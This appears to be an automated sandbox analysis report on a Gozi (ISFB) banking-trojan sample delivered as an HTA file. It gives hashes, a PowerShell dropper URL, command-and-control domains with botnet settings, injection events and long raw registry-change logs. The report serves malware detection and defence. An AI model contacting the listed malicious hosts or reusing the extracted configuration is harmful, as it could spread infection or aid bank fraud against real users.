gozi | c148a90c12cc2c6664e074799c4a19ad28bdd2c47e3f0bf7c553dbecf89bf8fc

Analysis

max time kernel
150s
max time network
137s
platform
windows10-2004_x64
resource
win10v2004-20230915-en
resource tags

arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
submitted
07/10/2023, 01:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4380de3cba18880ef72d2bc73ec84ee6f9f27b55d635a81ab8d40d488f59303d.hta
Size

22KB
MD5

57d3eb665f1e9e6a19f278baabd49e7b
SHA1

44566a9d716e6abd0304544dd88d245fea990882
SHA256

4380de3cba18880ef72d2bc73ec84ee6f9f27b55d635a81ab8d40d488f59303d
SHA512

30a0a3349aa0b815728abdb0c770d65354cdcf68ca939de4c175bdb285e3d664d7afdddc4be91bae170a65e4f808e6de7cc877fa36442f64f7b7db993e83851d
SSDEEP

384:rO6BO5aa8mOFhyS1q5H8qxAt4VFhmqmfW9PW6vN1v35Zh5LaBY5E6bqBdOfF:4zS0kPWVN5LbtcOfF

Score

10^/10

gozi 5050 banker isfb trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://communicalink.com/index.php

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

mifrutty.com

Attributes

base_path
/jerry/
build
250260
exe_type
loader
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Extracted

Family

gozi

Botnet

5050

http://igrovdow.com

Attributes

base_path
/pictures/
build
250260
exe_type
worker
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Signatures

Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi

Blocklisted process makes network request 1 IoCs

flow	pid	Process
34	1520	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation	mshta.exe

Executes dropped EXE 1 IoCs

pid	Process
3572	OPaUZKCu.exe

Suspicious use of SetThreadContext 8 IoCs

description	pid	Process	procid_target
PID 1700 set thread context of 3084	1700	powershell.exe	40
PID 3084 set thread context of 3780	3084	Explorer.EXE	10
PID 3084 set thread context of 4008	3084	Explorer.EXE	34
PID 3084 set thread context of 4768	3084	Explorer.EXE	21
PID 3084 set thread context of 1656	3084	Explorer.EXE	85
PID 3084 set thread context of 1372	3084	Explorer.EXE	110
PID 1372 set thread context of 3612	1372	cmd.exe	114
PID 3084 set thread context of 2868	3084	Explorer.EXE	112

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
3836	3572	WerFault.exe	95

Modifies registry class 64 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\86085240-b86f-41da-9 = "0"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9dda8cd1-5751-4632-a	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\342492ce-188b-4681-a = "0"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b983b763-7104-4f2b-9 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000aff32de1bef8d901a91773e1bef8d901a91773e1bef8d901b89a02000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000004757b90c2000386439316137643631313339306534316330656334356464326631653562303666336237316266636662306565626239323064646230643838363062613835630000b20009000400efbe4757b90c4757b90c2e0000000000000000000000000000000000000000000000000079aaf300380064003900310061003700640036003100310033003900300065003400310063003000650063003400350064006400320066003100650035006200300036006600330062003700310062006600630066006200300065006500620062003900320030006400640062003000640038003800360030006200610038003500630000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000005186a3881000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c38643931613764363131333930653431633065633435646432663165356230366633623731626663666230656562623932306464623064383836306261383563000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000736d696a776a6d68000000000000000052d8063eedfcdf448a23f9f8aed1bb8a6d23931f9653ee11941eca4df275542e52d8063eedfcdf448a23f9f8aed1bb8a6d23931f9653ee11941eca4df275542ece000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002d00000053002d0031002d0035002d00320031002d003900310039003200350034003400390032002d0033003900370039003200390033003900390037002d003700360034003400300037003100390032002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000530b1468000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6804de42-6312-4a0f-b	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\86085240-b86f-41da-9	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b983b763-7104-4f2b-9 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b983b763-7104-4f2b-9 = "\\\\?\\Volume{68140B53-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\8d91a7d611390e41c0ec45dd2f1e5b06f3b71bfcfb0eebb920ddb0d8860ba85c"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\074c6fd3-ea19-4c61-9 = a49aeae1bef8d901	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\074c6fd3-ea19-4c61-9	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\074c6fd3-ea19-4c61-9 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000d06743e1bef8d901a91773e1bef8d901a91773e1bef8d90128b202000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000004757b90c2000326562373534386635366639396336313732343237643666643264623339633336383232303765376139346330623438346538353966353939653135333032350000b20009000400efbe4757b90c4757b90c2e00000000000000000000000000000000000000000000000000f5f8e200320065006200370035003400380066003500360066003900390063003600310037003200340032003700640036006600640032006400620033003900630033003600380032003200300037006500370061003900340063003000620034003800340065003800350039006600350039003900650031003500330030003200350000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000005186a3881000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c32656237353438663536663939633631373234323764366664326462333963333638323230376537613934633062343834653835396635393965313533303235000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000736d696a776a6d68000000000000000052d8063eedfcdf448a23f9f8aed1bb8a6e23931f9653ee11941eca4df275542e52d8063eedfcdf448a23f9f8aed1bb8a6e23931f9653ee11941eca4df275542ece000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002d00000053002d0031002d0035002d00320031002d003900310039003200350034003400390032002d0033003900370039003200390033003900390037002d003700360034003400300037003100390032002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000530b1468000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8cbc5ce7-2782-4b68-8 = 649d09e1bef8d901	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8cbc5ce7-2782-4b68-8	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\342492ce-188b-4681-a = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\342492ce-188b-4681-a = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000f12e0ae1bef8d901f12e0ae1bef8d901f12e0ae1bef8d901000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000004757b90c2000363734646564373339346535646234663830656536366335306438633037623734336635353738306363666364393564636461353938306532353063616134650000b20009000400efbe4757b90c4757b90c2e000000000000000000000000000000000000000000000000000ffcc300360037003400640065006400370033003900340065003500640062003400660038003000650065003600360063003500300064003800630030003700620037003400330066003500350037003800300063006300660063006400390035006400630064006100350039003800300065003200350030006300610061003400650000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000005186a3881000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c36373464656437333934653564623466383065653636633530643863303762373433663535373830636366636439356463646135393830653235306361613465000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000736d696a776a6d68000000000000000052d8063eedfcdf448a23f9f8aed1bb8a6a23931f9653ee11941eca4df275542e52d8063eedfcdf448a23f9f8aed1bb8a6a23931f9653ee11941eca4df275542ece000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002d00000053002d0031002d0035002d00320031002d003900310039003200350034003400390032002d0033003900370039003200390033003900390037002d003700360034003400300037003100390032002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000530b1468000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0b90205b-b2a8-4ec5-8 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\871c0dcf-ee5b-4a88-b	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d258a096-c6f3-4110-b = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000000b32ebe0bef8d9010b32ebe0bef8d9010b32ebe0bef8d901000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000004757b90c2000326562373534386635366639396336313732343237643666643264623339633336383232303765376139346330623438346538353966353939653135333032350000b20009000400efbe4757b90c4757b90c2e00000000000000000000000000000000000000000000000000f5f8e200320065006200370035003400380066003500360066003900390063003600310037003200340032003700640036006600640032006400620033003900630033003600380032003200300037006500370061003900340063003000620034003800340065003800350039006600350039003900650031003500330030003200350000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000005186a3881000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c32656237353438663536663939633631373234323764366664326462333963333638323230376537613934633062343834653835396635393965313533303235000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000736d696a776a6d68000000000000000052d8063eedfcdf448a23f9f8aed1bb8a6623931f9653ee11941eca4df275542e52d8063eedfcdf448a23f9f8aed1bb8a6623931f9653ee11941eca4df275542ece000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002d00000053002d0031002d0035002d00320031002d003900310039003200350034003400390032002d0033003900370039003200390033003900390037002d003700360034003400300037003100390032002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000530b1468000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c865fe54-cc4c-4a9e-a = "8324"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9dda8cd1-5751-4632-a = "0"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9dda8cd1-5751-4632-a = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000005bbdf4e0bef8d9015bbdf4e0bef8d9015bbdf4e0bef8d901000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000004757b90c2000366161646566393733633832396339353935643666316539663335336432326336303961626439326634623433643131323039653634636662623133383631330000b20009000400efbe4757b90c4757b90c2e00000000000000000000000000000000000000000000000000a56dd900360061006100640065006600390037003300630038003200390063003900350039003500640036006600310065003900660033003500330064003200320063003600300039006100620064003900320066003400620034003300640031003100320030003900650036003400630066006200620031003300380036003100330000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000005186a3881000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c36616164656639373363383239633935393564366631653966333533643232633630396162643932663462343364313132303965363463666262313338363133000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000736d696a776a6d68000000000000000052d8063eedfcdf448a23f9f8aed1bb8a6823931f9653ee11941eca4df275542e52d8063eedfcdf448a23f9f8aed1bb8a6823931f9653ee11941eca4df275542ece000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002d00000053002d0031002d0035002d00320031002d003900310039003200350034003400390032002d0033003900370039003200390033003900390037002d003700360034003400300037003100390032002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000530b1468000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\342492ce-188b-4681-a = 09f60be1bef8d901	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\109ae8b5-93a3-426a-8 = "\\\\?\\Volume{68140B53-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\c3e43ce8a127b3a45751a8644b127ec119c7b3068db0714b0bc53272ebb1d13b"	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9dda8cd1-5751-4632-a	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\49a65774-0edc-4bb7-8 = dc1fe0e0bef8d901	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0b90205b-b2a8-4ec5-8	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0b90205b-b2a8-4ec5-8 = "0"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\109ae8b5-93a3-426a-8	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6804de42-6312-4a0f-b = "0"	RuntimeBroker.exe
